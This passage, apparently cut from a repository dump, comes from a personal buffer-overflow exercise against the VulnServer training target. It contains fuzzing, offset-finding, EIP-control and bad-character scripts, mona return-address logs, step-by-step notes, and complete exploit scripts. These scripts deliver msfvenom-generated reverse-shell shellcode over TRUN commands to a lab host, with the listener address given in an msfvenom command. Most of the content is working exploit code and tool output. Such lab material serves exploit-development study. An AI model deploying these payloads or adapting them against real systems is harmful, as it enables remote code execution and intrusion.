[essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 25 | 26 | Log data, item 5 27 | Address=625011F7 28 | Message= 0x625011f7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 29 | 30 | Log data, item 4 31 | Address=62501203 32 | Message= 0x62501203 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 33 | 34 | Log data, item 3 35 | Address=62501205 36 | Message= 0x62501205 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 37 | 38 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/return_add.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | "Ret address=>625011AF" 5 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." ) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/spike.spk: -------------------------------------------------------------------------------- 1 | s_readline(); 2 | s_string("LTER "); 3 | s_string_variable("0"); -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Eip_control.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | Shellcode="A" * 2003 +"B" * 4 5 | 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." ) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/ShellCode.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | "Ret address=>625011AF" 5 | 6 | exploit=("\xdb\xd1\xbb\xb1\x96\x2f\x26\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 7 | "\x52\x83\xc2\x04\x31\x5a\x13\x03\xeb\x85\xcd\xd3\xf7\x42\x93" 8 | "\x1c\x07\x93\xf4\x95\xe2\xa2\x34\xc1\x67\x94\x84\x81\x25\x19" 9 | "\x6e\xc7\xdd\xaa\x02\xc0\xd2\x1b\xa8\x36\xdd\x9c\x81\x0b\x7c" 10 | "\x1f\xd8\x5f\x5e\x1e\x13\x92\x9f\x67\x4e\x5f\xcd\x30\x04\xf2" 11 | "\xe1\x35\x50\xcf\x8a\x06\x74\x57\x6f\xde\x77\x76\x3e\x54\x2e" 12 | "\x58\xc1\xb9\x5a\xd1\xd9\xde\x67\xab\x52\x14\x13\x2a\xb2\x64" 13 | "\xdc\x81\xfb\x48\x2f\xdb\x3c\x6e\xd0\xae\x34\x8c\x6d\xa9\x83" 14 | "\xee\xa9\x3c\x17\x48\x39\xe6\xf3\x68\xee\x71\x70\x66\x5b\xf5" 15 | "\xde\x6b\x5a\xda\x55\x97\xd7\xdd\xb9\x11\xa3\xf9\x1d\x79\x77" 16 | "\x63\x04\x27\xd6\x9c\x56\x88\x87\x38\x1d\x25\xd3\x30\x7c\x22" 17 | "\x10\x79\x7e\xb2\x3e\x0a\x0d\x80\xe1\xa0\x99\xa8\x6a\x6f\x5e" 18 | "\xce\x40\xd7\xf0\x31\x6b\x28\xd9\xf5\x3f\x78\x71\xdf\x3f\x13" 19 | "\x81\xe0\x95\xb4\xd1\x4e\x46\x75\x81\x2e\x36\x1d\xcb\xa0\x69" 20 | "\x3d\xf4\x6a\x02\xd4\x0f\xfd\xed\x81\x0e\x6e\x85\xd3\x10\x94" 21 | "\x84\x5d\xf6\xfe\x38\x08\xa1\x96\xa1\x11\x39\x06\x2d\x8c\x44" 22 | "\x08\xa5\x23\xb9\xc7\x4e\x49\xa9\xb0\xbe\x04\x93\x17\xc0\xb2" 23 | "\xbb\xf4\x53\x59\x3b\x72\x48\xf6\x6c\xd3\xbe\x0f\xf8\xc9\x99" 24 | "\xb9\x1e\x10\x7f\x81\x9a\xcf\xbc\x0c\x23\x9d\xf9\x2a\x33\x5b" 25 | "\x01\x77\x67\x33\x54\x21\xd1\xf5\x0e\x83\x8b\xaf\xfd\x4d\x5b" 26 | "\x29\xce\x4d\x1d\x36\x1b\x38\xc1\x87\xf2\x7d\xfe\x28\x93\x89" 27 | "\x87\x54\x03\x75\x52\xdd\x23\x94\x76\x28\xcc\x01\x13\x91\x91" 28 | "\xb1\xce\xd6\xaf\x31\xfa\xa6\x4b\x29\x8f\xa3\x10\xed\x7c\xde" 29 | "\x09\x98\x82\x4d\x29\x89") 30 | 31 | 32 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" + "\x90" *32 +exploit 33 | 34 | try: 35 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 36 | s.connect(('192.168.1.133',9999)) 37 | print("Sending pattern to Remote server....." ) 38 | s.send(('TRUN /.:/'+ Shellcode)) 39 | s.close() 40 | 41 | except: 42 | print("Error in connecting") 43 | sys.exit() 44 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/Eip_control.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | Shellcode="A" * 2003 +"B" * 4 5 | 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." ) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/ShellCode.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | "Ret address=>625011AF" 5 | 6 | exploit=("\xda\xc0\xbb\x46\xaa\xba\x69\xd9\x74\x24\xf4\x58\x29\xc9\xb1" 7 | "\x52\x31\x58\x17\x03\x58\x17\x83\xae\x56\x58\x9c\xd2\x4f\x1f" 8 | "\x5f\x2a\x90\x40\xe9\xcf\xa1\x40\x8d\x84\x92\x70\xc5\xc8\x1e" 9 | "\xfa\x8b\xf8\x95\x8e\x03\x0f\x1d\x24\x72\x3e\x9e\x15\x46\x21" 10 | "\x1c\x64\x9b\x81\x1d\xa7\xee\xc0\x5a\xda\x03\x90\x33\x90\xb6" 11 | "\x04\x37\xec\x0a\xaf\x0b\xe0\x0a\x4c\xdb\x03\x3a\xc3\x57\x5a" 12 | "\x9c\xe2\xb4\xd6\x95\xfc\xd9\xd3\x6c\x77\x29\xaf\x6e\x51\x63" 13 | "\x50\xdc\x9c\x4b\xa3\x1c\xd9\x6c\x5c\x6b\x13\x8f\xe1\x6c\xe0" 14 | "\xed\x3d\xf8\xf2\x56\xb5\x5a\xde\x67\x1a\x3c\x95\x64\xd7\x4a" 15 | "\xf1\x68\xe6\x9f\x8a\x95\x63\x1e\x5c\x1c\x37\x05\x78\x44\xe3" 16 | "\x24\xd9\x20\x42\x58\x39\x8b\x3b\xfc\x32\x26\x2f\x8d\x19\x2f" 17 | "\x9c\xbc\xa1\xaf\x8a\xb7\xd2\x9d\x15\x6c\x7c\xae\xde\xaa\x7b" 18 | "\xd1\xf4\x0b\x13\x2c\xf7\x6b\x3a\xeb\xa3\x3b\x54\xda\xcb\xd7" 19 | "\xa4\xe3\x19\x77\xf4\x4b\xf2\x38\xa4\x2b\xa2\xd0\xae\xa3\x9d" 20 | "\xc1\xd1\x69\xb6\x68\x28\xfa\x79\xc4\x33\x69\x11\x17\x33\x89" 21 | "\x30\x9e\xd5\xfb\xa4\xf7\x4e\x94\x5d\x52\x04\x05\xa1\x48\x61" 22 | "\x05\x29\x7f\x96\xc8\xda\x0a\x84\xbd\x2a\x41\xf6\x68\x34\x7f" 23 | "\x9e\xf7\xa7\xe4\x5e\x71\xd4\xb2\x09\xd6\x2a\xcb\xdf\xca\x15" 24 | "\x65\xfd\x16\xc3\x4e\x45\xcd\x30\x50\x44\x80\x0d\x76\x56\x5c" 25 | "\x8d\x32\x02\x30\xd8\xec\xfc\xf6\xb2\x5e\x56\xa1\x69\x09\x3e" 26 | "\x34\x42\x8a\x38\x39\x8f\x7c\xa4\x88\x66\x39\xdb\x25\xef\xcd" 27 | "\xa4\x5b\x8f\x32\x7f\xd8\xaf\xd0\x55\x15\x58\x4d\x3c\x94\x05" 28 | "\x6e\xeb\xdb\x33\xed\x19\xa4\xc7\xed\x68\xa1\x8c\xa9\x81\xdb" 29 | "\x9d\x5f\xa5\x48\x9d\x75") 30 | 31 | 32 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" + "\x90" *32 +exploit 33 | 34 | try: 35 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 36 | s.connect(('192.168.1.133',9999)) 37 | print("Sending pattern to Remote server....." ) 38 | s.send(('TRUN /.:/'+ Shellcode)) 39 | s.close() 40 | 41 | except: 42 | print("Error in connecting") 43 | sys.exit() 44 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/bad_char: -------------------------------------------------------------------------------- 1 | badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 2 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 3 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 4 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 5 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 6 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 7 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 8 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 9 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/bad_char.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 5 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 6 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 7 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 8 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 9 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 10 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 11 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 12 | 13 | Shellcode="A" * 2003 +"B" * 4 + badchars 14 | 15 | 16 | try: 17 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 18 | s.connect(('192.168.1.133',9999)) 19 | print("Sending pattern to Remote server....." ) 20 | s.send(('TRUN /.:/'+ Shellcode)) 21 | s.close() 22 | 23 | except: 24 | print("Error in connecting") 25 | sys.exit() 26 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/exploit_code: -------------------------------------------------------------------------------- 1 | msfvenom -p windows/shell_reverse_tcp LHOS=192.168.1.147 LPORT=1234 EXITFUNC=thread -f c -b "\x00" 2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 3 | [-] No arch selected, selecting arch: x86 from the payload 4 | Found 11 compatible encoders 5 | Attempting to encode payload with 1 iterations of x86/shikata_ga_nai 6 | x86/shikata_ga_nai succeeded with size 351 (iteration=0) 7 | x86/shikata_ga_nai chosen with final size 351 8 | Payload size: 351 bytes 9 | Final size of c file: 1500 bytes 10 | unsigned char buf[] = 11 | "\xdb\xd1\xbb\xb1\x96\x2f\x26\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 12 | "\x52\x83\xc2\x04\x31\x5a\x13\x03\xeb\x85\xcd\xd3\xf7\x42\x93" 13 | "\x1c\x07\x93\xf4\x95\xe2\xa2\x34\xc1\x67\x94\x84\x81\x25\x19" 14 | "\x6e\xc7\xdd\xaa\x02\xc0\xd2\x1b\xa8\x36\xdd\x9c\x81\x0b\x7c" 15 | "\x1f\xd8\x5f\x5e\x1e\x13\x92\x9f\x67\x4e\x5f\xcd\x30\x04\xf2" 16 | "\xe1\x35\x50\xcf\x8a\x06\x74\x57\x6f\xde\x77\x76\x3e\x54\x2e" 17 | "\x58\xc1\xb9\x5a\xd1\xd9\xde\x67\xab\x52\x14\x13\x2a\xb2\x64" 18 | "\xdc\x81\xfb\x48\x2f\xdb\x3c\x6e\xd0\xae\x34\x8c\x6d\xa9\x83" 19 | "\xee\xa9\x3c\x17\x48\x39\xe6\xf3\x68\xee\x71\x70\x66\x5b\xf5" 20 | "\xde\x6b\x5a\xda\x55\x97\xd7\xdd\xb9\x11\xa3\xf9\x1d\x79\x77" 21 | "\x63\x04\x27\xd6\x9c\x56\x88\x87\x38\x1d\x25\xd3\x30\x7c\x22" 22 | "\x10\x79\x7e\xb2\x3e\x0a\x0d\x80\xe1\xa0\x99\xa8\x6a\x6f\x5e" 23 | "\xce\x40\xd7\xf0\x31\x6b\x28\xd9\xf5\x3f\x78\x71\xdf\x3f\x13" 24 | "\x81\xe0\x95\xb4\xd1\x4e\x46\x75\x81\x2e\x36\x1d\xcb\xa0\x69" 25 | "\x3d\xf4\x6a\x02\xd4\x0f\xfd\xed\x81\x0e\x6e\x85\xd3\x10\x94" 26 | "\x84\x5d\xf6\xfe\x38\x08\xa1\x96\xa1\x11\x39\x06\x2d\x8c\x44" 27 | "\x08\xa5\x23\xb9\xc7\x4e\x49\xa9\xb0\xbe\x04\x93\x17\xc0\xb2" 28 | "\xbb\xf4\x53\x59\x3b\x72\x48\xf6\x6c\xd3\xbe\x0f\xf8\xc9\x99" 29 | "\xb9\x1e\x10\x7f\x81\x9a\xcf\xbc\x0c\x23\x9d\xf9\x2a\x33\x5b" 30 | "\x01\x77\x67\x33\x54\x21\xd1\xf5\x0e\x83\x8b\xaf\xfd\x4d\x5b" 31 | "\x29\xce\x4d\x1d\x36\x1b\x38\xc1\x87\xf2\x7d\xfe\x28\x93\x89" 32 | "\x87\x54\x03\x75\x52\xdd\x23\x94\x76\x28\xcc\x01\x13\x91\x91" 33 | "\xb1\xce\xd6\xaf\x31\xfa\xa6\x4b\x29\x8f\xa3\x10\xed\x7c\xde" 34 | "\x09\x98\x82\x4d\x29\x89"; 35 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/fuzz.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | from time import sleep 3 | 4 | buffer ="A" * 100 5 | 6 | while True: 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print "Trying with buffer length %d" % len(buffer) 11 | s.send(('LTER /.:/'+ buffer)) 12 | s.close() 13 | sleep(1) 14 | buffer=buffer + "A"*100 15 | 16 | 17 | except: 18 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 19 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/index: -------------------------------------------------------------------------------- 1 | Vuln Server part 2 LTER 2 | 3 | 4 | A. Spiking =>generic_send_tcp 192.168.1.133 9999 spike.spk 0 0 5 | 6 | 7 | B. Fuzzing => buyffer crash at 2100 8 | 9 | 10 | C. Findinf offset=> 11 | /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2100 12 | 13 | EIP Pointer-=> 386F4337 14 | 15 | D. Finding exject buffer buffer sdpace via offset 16 | 17 | /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2100 -q 386F4337 18 | 19 | Exject Match=> 2003 20 | 21 | 22 | E. Controloing EIP { Shellcode="A" * 2003 +"B" * 4 } 23 | 24 | F FInding bad chacacter Shellcode="A" * 2003 +"B" * 4 + bad_char 25 | 26 | "\x00" + 27 | 28 | G: modules to set find exject ESP address DLL 29 | { 30 | !mona modules => 31 | 32 | Address=0BADF00D [essfunc.dll] (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 33 | 34 | Address=0BADF00D [vulnserver.exe] (C:\Users\vinod\Desktop\Vul UFF\vulnserver.exe) 35 | 36 | } 37 | 38 | H Finding JMP ESP modules for "FFE4" 39 | 40 | !mona find -s "\xff\xe4" -m essfunc.dll 41 | return address=> 42 | Address=625011AF 43 | Address=625011BB 44 | Address=625011C7 45 | Address=625011D3 46 | Address=625011DF 47 | Address=625011EB 48 | Address=625011F7 49 | Address=62501203 50 | Address=62501205 51 | 52 | I G: Check for EIP contril and vreak point 53 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" 54 | 55 | H: shell code 56 | msfvenom -p windows/shell_reverse_tcp LHOS=192.168.1.147 LPORT=1234 EXITFUNC=thread -f c -b "\x00" -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/offset.py: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | import sys, socket 3 | 4 | 5 | offset="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9" 6 | 7 | 8 | try: 9 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 10 | s.connect(('192.168.1.133',9999)) 11 | print("Sending pattern to Remote server" ) 12 | s.send(('TRUN /.:/'+ offset)) 13 | s.close() 14 | 15 | except: 16 | print("Error in connecting") 17 | sys.exit() 18 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/ret_add: -------------------------------------------------------------------------------- 1 | Log data, item 11 2 | Address=625011AF 3 | Message= 0x625011af : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 4 | 5 | 6 | Log data, item 10 7 | Address=625011BB 8 | Message= 0x625011bb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 9 | 10 | Log data, item 9 11 | Address=625011C7 12 | Message= 0x625011c7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 13 | 14 | Log data, item 8 15 | Address=625011D3 16 | Message= 0x625011d3 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 17 | 18 | Log data, item 7 19 | Address=625011DF 20 | Message= 0x625011df : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 21 | 22 | Log data, item 6 23 | Address=625011EB 24 | Message= 0x625011eb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 25 | 26 | Log data, item 5 27 | Address=625011F7 28 | Message= 0x625011f7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 29 | 30 | Log data, item 4 31 | Address=62501203 32 | Message= 0x62501203 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 33 | 34 | Log data, item 3 35 | Address=62501205 36 | Message= 0x62501205 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 37 | 38 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/return_add.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | "Ret address=>625011AF" 5 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." ) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/Vuln Part2/spike.spk: -------------------------------------------------------------------------------- 1 | s_readline(); 2 | s_string("LTER "); 3 | s_string_variable("0"); -------------------------------------------------------------------------------- /BufferOverflow/VulnServer/bad_char: -------------------------------------------------------------------------------- 1 | badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 2 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 3 | 